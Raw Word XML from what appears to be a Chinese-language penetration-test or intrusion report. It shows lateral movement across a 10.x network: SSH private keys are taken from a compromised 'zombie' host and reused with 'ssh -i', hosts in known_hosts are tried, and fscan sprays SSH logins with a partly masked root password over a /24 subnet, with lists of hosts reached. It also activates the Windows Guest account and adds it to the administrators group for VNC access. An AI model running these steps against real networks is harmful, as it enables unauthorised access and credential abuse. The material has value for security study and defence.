      <w:bookmarkStart w:id="651" w:name="_Toc25974"/>
      <w:bookmarkStart w:id="652" w:name="_Toc29092"/>
      <w:bookmarkStart w:id="653" w:name="_Toc26024"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ssh 连接端口为62222</w:t>
      </w:r>
      <w:bookmarkEnd w:id="647"/>
      <w:bookmarkEnd w:id="648"/>
      <w:bookmarkEnd w:id="649"/>
      <w:bookmarkEnd w:id="650"/>
      <w:bookmarkEnd w:id="651"/>
      <w:bookmarkEnd w:id="652"/>
      <w:bookmarkEnd w:id="653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92705" cy="2005965"/>
            <wp:effectExtent l="0" t="0" r="13335" b="571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54" w:name="_Toc8352"/>
      <w:bookmarkStart w:id="655" w:name="_Toc5083"/>
      <w:bookmarkStart w:id="656" w:name="_Toc25980"/>
      <w:bookmarkStart w:id="657" w:name="_Toc793"/>
      <w:bookmarkStart w:id="658" w:name="_Toc19093"/>
      <w:bookmarkStart w:id="659" w:name="_Toc23653"/>
      <w:bookmarkStart w:id="660" w:name="_Toc10283"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 连接成功：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="654"/>
      <w:bookmarkEnd w:id="655"/>
      <w:bookmarkEnd w:id="656"/>
      <w:bookmarkEnd w:id="657"/>
      <w:bookmarkEnd w:id="658"/>
      <w:bookmarkEnd w:id="659"/>
      <w:bookmarkEnd w:id="66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36010" cy="1907540"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270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61" w:name="_Toc3689"/>
      <w:bookmarkStart w:id="662" w:name="_Toc18103"/>
      <w:bookmarkStart w:id="663" w:name="_Toc985"/>
      <w:bookmarkStart w:id="664" w:name="_Toc25082"/>
      <w:bookmarkStart w:id="665" w:name="_Toc15995"/>
      <w:bookmarkStart w:id="666" w:name="_Toc24317"/>
      <w:bookmarkStart w:id="667" w:name="_Toc22556"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看.ssh/下的文件：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="661"/>
      <w:bookmarkEnd w:id="662"/>
      <w:bookmarkEnd w:id="663"/>
      <w:bookmarkEnd w:id="664"/>
      <w:bookmarkEnd w:id="665"/>
      <w:bookmarkEnd w:id="666"/>
      <w:bookmarkEnd w:id="667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38170" cy="1146175"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1206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68" w:name="_Toc12666"/>
      <w:bookmarkStart w:id="669" w:name="_Toc24340"/>
      <w:bookmarkStart w:id="670" w:name="_Toc24971"/>
      <w:bookmarkStart w:id="671" w:name="_Toc21437"/>
      <w:bookmarkStart w:id="672" w:name="_Toc4047"/>
      <w:bookmarkStart w:id="673" w:name="_Toc16230"/>
      <w:bookmarkStart w:id="674" w:name="_Toc451"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用目标私钥和公钥文件登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="668"/>
      <w:bookmarkEnd w:id="669"/>
      <w:bookmarkEnd w:id="670"/>
      <w:bookmarkEnd w:id="671"/>
      <w:bookmarkEnd w:id="672"/>
      <w:bookmarkEnd w:id="673"/>
      <w:bookmarkEnd w:id="674"/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3256915" cy="928370"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1270"/>
            <wp:docPr id="1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675" w:name="_Toc2653"/>
      <w:bookmarkStart w:id="676" w:name="_Toc20112"/>
      <w:bookmarkStart w:id="677" w:name="_Toc5614"/>
      <w:bookmarkStart w:id="678" w:name="_Toc8166"/>
      <w:bookmarkStart w:id="679" w:name="_Toc21489"/>
      <w:bookmarkStart w:id="680" w:name="_Toc17663"/>
      <w:bookmarkStart w:id="681" w:name="_Toc22392"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 私钥成功登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="675"/>
      <w:bookmarkEnd w:id="676"/>
      <w:bookmarkEnd w:id="677"/>
      <w:bookmarkEnd w:id="678"/>
      <w:bookmarkEnd w:id="679"/>
      <w:bookmarkEnd w:id="680"/>
      <w:bookmarkEnd w:id="681"/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682" w:name="_Toc7341"/>
      <w:bookmarkStart w:id="683" w:name="_Toc14604"/>
      <w:bookmarkStart w:id="684" w:name="_Toc4514"/>
      <w:bookmarkStart w:id="685" w:name="_Toc17961"/>
      <w:bookmarkStart w:id="686" w:name="_Toc313"/>
      <w:bookmarkStart w:id="687" w:name="_Toc525"/>
      <w:bookmarkStart w:id="688" w:name="_Toc5421"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mobaxterm利用私钥登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="682"/>
      <w:bookmarkEnd w:id="683"/>
      <w:bookmarkEnd w:id="684"/>
      <w:bookmarkEnd w:id="685"/>
      <w:bookmarkEnd w:id="686"/>
      <w:bookmarkEnd w:id="687"/>
      <w:bookmarkEnd w:id="688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759710" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="13970" b="381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689" w:name="_Toc4214"/>
      <w:bookmarkStart w:id="690" w:name="_Toc18129"/>
      <w:bookmarkStart w:id="691" w:name="_Toc27509"/>
      <w:bookmarkStart w:id="692" w:name="_Toc6103"/>
      <w:bookmarkStart w:id="693" w:name="_Toc22068"/>
      <w:bookmarkStart w:id="694" w:name="_Toc7962"/>
      <w:bookmarkStart w:id="695" w:name="_Toc14119"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用肉鸡:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,登录10.88.17.9</w:t>
      </w:r>
      <w:bookmarkEnd w:id="689"/>
      <w:bookmarkEnd w:id="690"/>
      <w:bookmarkEnd w:id="691"/>
      <w:bookmarkEnd w:id="692"/>
      <w:bookmarkEnd w:id="693"/>
      <w:bookmarkEnd w:id="694"/>
      <w:bookmarkEnd w:id="695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[root@nginx-yumserver test]# chmod 600 id_rsa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（注意私钥文件权限为600,也就是rw- --- ---）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[root@nginx-yumserver test]# ssh -i id_rsa root@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 62222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51960" cy="2334895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1206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696" w:name="_Toc17981"/>
      <w:bookmarkStart w:id="697" w:name="_Toc4019"/>
      <w:bookmarkStart w:id="698" w:name="_Toc4157"/>
      <w:bookmarkStart w:id="699" w:name="_Toc5195"/>
      <w:bookmarkStart w:id="700" w:name="_Toc24705"/>
      <w:bookmarkStart w:id="701" w:name="_Toc14974"/>
      <w:bookmarkStart w:id="702" w:name="_Toc2764"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看 known_hosts文件：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="696"/>
      <w:bookmarkEnd w:id="697"/>
      <w:bookmarkEnd w:id="698"/>
      <w:bookmarkEnd w:id="699"/>
      <w:bookmarkEnd w:id="700"/>
      <w:bookmarkEnd w:id="701"/>
      <w:bookmarkEnd w:id="70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77640" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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03" w:name="_Toc26102"/>
      <w:bookmarkStart w:id="704" w:name="_Toc9761"/>
      <w:bookmarkStart w:id="705" w:name="_Toc13811"/>
      <w:bookmarkStart w:id="706" w:name="_Toc58"/>
      <w:bookmarkStart w:id="707" w:name="_Toc26053"/>
      <w:bookmarkStart w:id="708" w:name="_Toc32104"/>
      <w:bookmarkStart w:id="709" w:name="_Toc9571"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>尝试登录known_hosts文件里的主机：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="703"/>
      <w:bookmarkEnd w:id="704"/>
      <w:bookmarkEnd w:id="705"/>
      <w:bookmarkEnd w:id="706"/>
      <w:bookmarkEnd w:id="707"/>
      <w:bookmarkEnd w:id="708"/>
      <w:bookmarkEnd w:id="709"/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710" w:name="_Toc16488"/>
      <w:bookmarkStart w:id="711" w:name="_Toc19316"/>
      <w:bookmarkStart w:id="712" w:name="_Toc23516"/>
      <w:bookmarkStart w:id="713" w:name="_Toc11946"/>
      <w:bookmarkStart w:id="714" w:name="_Toc20728"/>
      <w:bookmarkStart w:id="715" w:name="_Toc5630"/>
      <w:bookmarkStart w:id="716" w:name="_Toc2117"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.88.17.8成功登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="710"/>
      <w:bookmarkEnd w:id="711"/>
      <w:bookmarkEnd w:id="712"/>
      <w:bookmarkEnd w:id="713"/>
      <w:bookmarkEnd w:id="714"/>
      <w:bookmarkEnd w:id="715"/>
      <w:bookmarkEnd w:id="716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用户名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10.*.*.8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64915" cy="2116455"/>
            <wp:effectExtent l="0" t="0" r="14605" b="190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717" w:name="_Toc20631"/>
      <w:bookmarkStart w:id="718" w:name="_Toc20892"/>
      <w:bookmarkStart w:id="719" w:name="_Toc14685"/>
      <w:bookmarkStart w:id="720" w:name="_Toc29135"/>
      <w:bookmarkStart w:id="721" w:name="_Toc16570"/>
      <w:bookmarkStart w:id="722" w:name="_Toc11613"/>
      <w:bookmarkStart w:id="723" w:name="_Toc21105"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 成功登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="717"/>
      <w:bookmarkEnd w:id="718"/>
      <w:bookmarkEnd w:id="719"/>
      <w:bookmarkEnd w:id="720"/>
      <w:bookmarkEnd w:id="721"/>
      <w:bookmarkEnd w:id="722"/>
      <w:bookmarkEnd w:id="723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用户名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10.*.*.55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20745" cy="1948180"/>
            <wp:effectExtent l="0" t="0" r="8255" b="254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 </w:t>
      </w:r>
      <w:bookmarkStart w:id="724" w:name="_Toc14370"/>
      <w:bookmarkStart w:id="725" w:name="_Toc16547"/>
      <w:bookmarkStart w:id="726" w:name="_Toc12447"/>
      <w:bookmarkStart w:id="727" w:name="_Toc5267"/>
      <w:bookmarkStart w:id="728" w:name="_Toc23234"/>
      <w:bookmarkStart w:id="729" w:name="_Toc8054"/>
      <w:bookmarkStart w:id="730" w:name="_Toc6858"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 成功登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="724"/>
      <w:bookmarkEnd w:id="725"/>
      <w:bookmarkEnd w:id="726"/>
      <w:bookmarkEnd w:id="727"/>
      <w:bookmarkEnd w:id="728"/>
      <w:bookmarkEnd w:id="729"/>
      <w:bookmarkEnd w:id="730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用户名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10.*.*.53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41750" cy="2078990"/>
            <wp:effectExtent l="0" t="0" r="13970" b="889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31" w:name="_Toc16507"/>
      <w:bookmarkStart w:id="732" w:name="_Toc31737"/>
      <w:bookmarkStart w:id="733" w:name="_Toc10507"/>
      <w:bookmarkStart w:id="734" w:name="_Toc5858"/>
      <w:bookmarkStart w:id="735" w:name="_Toc20135"/>
      <w:bookmarkStart w:id="736" w:name="_Toc11"/>
      <w:bookmarkStart w:id="737" w:name="_Toc18286"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>批量ssh探测（指定用户名和密码）：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="731"/>
      <w:bookmarkEnd w:id="732"/>
      <w:bookmarkEnd w:id="733"/>
      <w:bookmarkEnd w:id="734"/>
      <w:bookmarkEnd w:id="735"/>
      <w:bookmarkEnd w:id="736"/>
      <w:bookmarkEnd w:id="73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fscan64.exe -hf ip.txt  -m ssh -user  root  -pwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PO******020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 62222 -t 60000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738" w:name="_Toc29254"/>
      <w:bookmarkStart w:id="739" w:name="_Toc4071"/>
      <w:bookmarkStart w:id="740" w:name="_Toc21161"/>
      <w:bookmarkStart w:id="741" w:name="_Toc10807"/>
      <w:bookmarkStart w:id="742" w:name="_Toc24830"/>
      <w:bookmarkStart w:id="743" w:name="_Toc29071"/>
      <w:bookmarkStart w:id="744" w:name="_Toc7270"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/24网段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="738"/>
      <w:bookmarkEnd w:id="739"/>
      <w:bookmarkEnd w:id="740"/>
      <w:bookmarkEnd w:id="741"/>
      <w:bookmarkEnd w:id="742"/>
      <w:bookmarkEnd w:id="743"/>
      <w:bookmarkEnd w:id="74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80895" cy="481330"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="745" w:name="_Toc18787"/>
      <w:bookmarkStart w:id="746" w:name="_Toc10720"/>
      <w:bookmarkStart w:id="747" w:name="_Toc14585"/>
      <w:bookmarkStart w:id="748" w:name="_Toc680"/>
      <w:bookmarkStart w:id="749" w:name="_Toc25978"/>
      <w:bookmarkStart w:id="750" w:name="_Toc29520"/>
      <w:bookmarkStart w:id="751" w:name="_Toc29338"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果：25个</w:t>
      </w:r>
      <w:bookmarkEnd w:id="745"/>
      <w:bookmarkEnd w:id="746"/>
      <w:bookmarkEnd w:id="747"/>
      <w:bookmarkEnd w:id="748"/>
      <w:bookmarkEnd w:id="749"/>
      <w:bookmarkEnd w:id="750"/>
      <w:bookmarkEnd w:id="751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334895" cy="1225550"/>
            <wp:effectExtent l="0" t="0" r="12065" b="8890"/>
            <wp:docPr id="151" name="图片 151" descr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10.*.*.9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10.*.*.29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10.*.*.30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10.*.*.33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10.*.*.8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10.*.*.35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10.*.*.40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10.*.*.31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10.*.*.38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10.*.*.39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10.*.*.23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10.*.*.32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10.*.*.13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10.*.*.53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10.*.*.34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10.*.*.45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10.*.*.36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10.*.*.14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10.*.*.37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10.*.*.25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10.*.*.28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10.*.*.7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10.*.*.61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10.*.*.27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[+] SSH:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">:62222:root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PO******020</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roma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752" w:name="_Toc22805"/>
      <w:bookmarkStart w:id="753" w:name="_Toc11058"/>
      <w:bookmarkStart w:id="754" w:name="_Toc6039"/>
      <w:bookmarkStart w:id="755" w:name="_Toc7600"/>
      <w:bookmarkStart w:id="756" w:name="_Toc31"/>
      <w:bookmarkStart w:id="757" w:name="_Toc17347"/>
      <w:bookmarkStart w:id="758" w:name="_Toc29818"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Known_hosts里的主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="752"/>
      <w:bookmarkEnd w:id="753"/>
      <w:bookmarkEnd w:id="754"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（128个）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="755"/>
      <w:bookmarkEnd w:id="756"/>
      <w:bookmarkEnd w:id="757"/>
      <w:bookmarkEnd w:id="758"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="19"/>
        <w:tblW w:w="1524" w:type="dxa"/>
        <w:tblInd w:w="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524" w:type="dxa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shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr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10.*.*.9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166495" cy="1015365"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715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 w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="759" w:name="_Toc32005"/>
      <w:bookmarkStart w:id="760" w:name="_Toc10052"/>
      <w:bookmarkStart w:id="761" w:name="_Toc12780"/>
      <w:bookmarkStart w:id="762" w:name="_Toc6605"/>
      <w:bookmarkStart w:id="763" w:name="_Toc25444"/>
      <w:bookmarkStart w:id="764" w:name="_Toc11169"/>
      <w:bookmarkStart w:id="765" w:name="_Toc3112"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="759"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：2个</w:t>
      </w:r>
      <w:bookmarkEnd w:id="760"/>
      <w:bookmarkEnd w:id="761"/>
      <w:bookmarkEnd w:id="762"/>
      <w:bookmarkEnd w:id="763"/>
      <w:bookmarkEnd w:id="764"/>
      <w:bookmarkEnd w:id="765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583180" cy="1532890"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="152" name="图片 152" descr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用户名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 w:eastAsiaTheme="minorEastAsia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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>10.*.*.56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eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>10.*.*.115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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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766" w:name="_Toc21981"/>
      <w:bookmarkStart w:id="767" w:name="_Toc21626"/>
      <w:bookmarkStart w:id="768" w:name="_Toc13873"/>
      <w:bookmarkStart w:id="769" w:name="_Toc7374"/>
      <w:bookmarkStart w:id="770" w:name="_Toc27194"/>
      <w:bookmarkStart w:id="771" w:name="_Toc26797"/>
      <w:bookmarkStart w:id="772" w:name="_Toc11771"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不是系统权限也能远程VNC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="766"/>
      <w:bookmarkEnd w:id="767"/>
      <w:bookmarkEnd w:id="768"/>
      <w:bookmarkEnd w:id="769"/>
      <w:bookmarkEnd w:id="770"/>
      <w:bookmarkEnd w:id="771"/>
      <w:bookmarkEnd w:id="772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65650" cy="2362835"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1460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773" w:name="_Toc30002"/>
      <w:bookmarkStart w:id="774" w:name="_Toc7118"/>
      <w:bookmarkStart w:id="775" w:name="_Toc18290"/>
      <w:bookmarkStart w:id="776" w:name="_Toc7174"/>
      <w:bookmarkStart w:id="777" w:name="_Toc24088"/>
      <w:bookmarkStart w:id="778" w:name="_Toc29630"/>
      <w:bookmarkStart w:id="779" w:name="_Toc9302"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>激活Guest用户加入管理员组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="773"/>
      <w:bookmarkEnd w:id="774"/>
      <w:bookmarkEnd w:id="775"/>
      <w:bookmarkEnd w:id="776"/>
      <w:bookmarkEnd w:id="777"/>
      <w:bookmarkEnd w:id="778"/>
      <w:bookmarkEnd w:id="779"/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80" w:name="_Toc15884"/>
      <w:bookmarkStart w:id="781" w:name="_Toc8465"/>
      <w:bookmarkStart w:id="782" w:name="_Toc32584"/>
      <w:bookmarkStart w:id="783" w:name="_Toc21812"/>
      <w:bookmarkStart w:id="784" w:name="_Toc6683"/>
      <w:bookmarkStart w:id="785" w:name="_Toc5286"/>
      <w:bookmarkStart w:id="786" w:name="_Toc11337"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>激活Guest用户</w:t>
      </w:r>
      <w:bookmarkEnd w:id="780"/>
      <w:bookmarkEnd w:id="781"/>
      <w:bookmarkEnd w:id="782"/>
      <w:bookmarkEnd w:id="783"/>
      <w:bookmarkEnd w:id="784"/>
      <w:bookmarkEnd w:id="785"/>
      <w:bookmarkEnd w:id="78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34765" cy="1972945"/>
            <wp:effectExtent l="0" t="0" r="5715" b="825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787" w:name="_Toc17507"/>
      <w:bookmarkStart w:id="788" w:name="_Toc5423"/>
      <w:bookmarkStart w:id="789" w:name="_Toc10843"/>
      <w:bookmarkStart w:id="790" w:name="_Toc28315"/>
      <w:bookmarkStart w:id="791" w:name="_Toc13754"/>
      <w:bookmarkStart w:id="792" w:name="_Toc23715"/>
      <w:bookmarkStart w:id="793" w:name="_Toc29830"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加入Guest用户至管理员组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="787"/>
      <w:bookmarkEnd w:id="788"/>
      <w:bookmarkEnd w:id="789"/>
      <w:bookmarkEnd w:id="790"/>
      <w:bookmarkEnd w:id="791"/>
      <w:bookmarkEnd w:id="792"/>
      <w:bookmarkEnd w:id="793"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="725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25925" cy="2192020"/>
            <wp:effectExtent l="0" t="0" r="10795" b="25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25"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="794" w:name="_Toc19802"/>
      <w:bookmarkStart w:id="795" w:name="_Toc20848"/>
      <w:bookmarkStart w:id="796" w:name="_Toc9106"/>
      <w:bookmarkStart w:id="797" w:name="_Toc3764"/>
      <w:bookmarkStart w:id="798" w:name="_Toc3177"/>
      <w:bookmarkStart w:id="799" w:name="_Toc14054"/>
      <w:bookmarkStart w:id="800" w:name="_Toc10418"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现不在管理员组内</w:t>
      </w:r>
      <w:bookmarkEnd w:id="794"/>
      <w:bookmarkEnd w:id="795"/>
      <w:bookmarkEnd w:id="796"/>
      <w:bookmarkEnd w:id="797"/>
      <w:bookmarkEnd w:id="798"/>
      <w:bookmarkEnd w:id="799"/>
      <w:bookmarkEnd w:id="800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63060" cy="3211830"/>
            <wp:effectExtent l="0" t="0" r="12700" b="381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01" w:name="_Toc8156"/>
      <w:bookmarkStart w:id="802" w:name="_Toc19999"/>
      <w:bookmarkStart w:id="803" w:name="_Toc7158"/>
      <w:bookmarkStart w:id="804" w:name="_Toc25159"/>
      <w:bookmarkStart w:id="805" w:name="_Toc5659"/>
      <w:bookmarkStart w:id="806" w:name="_Toc12827"/>
      <w:bookmarkStart w:id="807" w:name="_Toc22726"/>
      <w:r>
        <w:rPr>
